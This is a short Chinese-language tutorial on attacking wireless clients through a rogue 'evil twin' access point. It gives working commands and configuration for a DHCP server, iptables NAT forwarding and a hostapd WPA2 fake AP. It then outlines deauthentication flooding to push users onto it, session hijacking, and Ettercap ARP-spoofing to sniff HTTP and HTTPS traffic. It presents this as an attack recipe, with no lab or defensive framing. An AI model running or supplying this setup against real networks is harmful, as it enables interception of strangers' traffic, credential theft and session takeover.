攻击客户端
通过使用伪AP的方式来攻击客户端,监听数据、劫持会话、控制客户端
创建伪AP
- 首先安装DHCP服务
sudo apt-get install isc-dhcp-server -y
- 修改
/etc/dhcp/dhcpd.conf
文件配置:
default-lease-time 600;
max-lease-time 7200;
ddns-update-style none;
authoritative;
subnet 192.168.2.0 netmask 255.255.255.0 {
range 192.168.2.100 192.168.2.200;
option subnet-mask 255.255.255.0;
option routers 192.168.2.1;
option broadcast-address 192.168.2.255;
option domain-name-servers 192.168.2.1;
}
- 修改
/etc/default/isc-dhcp-server
:
INTERFACESv4="wlan0"
启动DHCP服务
配置网络接口信息:
ifconfig wlan0 192.168.2.1/24
启动DHCP服务:
sudo service isc-dhcp-server start
查看DHCP服务状态:
sudo service isc-dhcp-server status
创建Iptables规则来启用包转发
iptables --flush iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE iptables --append FORWARD --in-interface wlan0 -j ACCEPT sysctl -w net.ipv4.ip_forward=1
使用Hostapd创建伪AP
编辑伪AP配置文件:
/etc/hostapd/hostapd-wpa2.conf
interface=wlan0 ssid=WPA2 channel=6 beacon_int=100 hw_mode=g wpa=2 wpa_passphrase=12345678 wpa_key_mgmt=WPA-PSK rsn_pairwise=CCMP
启动:
hostapd /etc/hostapd/hostapd-wpa2.conf
强制客户端连接到伪AP
通过取消认证洪水攻击来使用户断开与之前网络的连接,并连到我们设置的伪AP中去
劫持会话
用户连接到我们的网络中后,抓其流量包来劫持会话
监听数据
中间人攻击
Ettercap是一个基于ARP地址欺骗方式的网络嗅探工具,可以用来嗅探网络数据包
之后可以监听HTTP和HTTPS的数据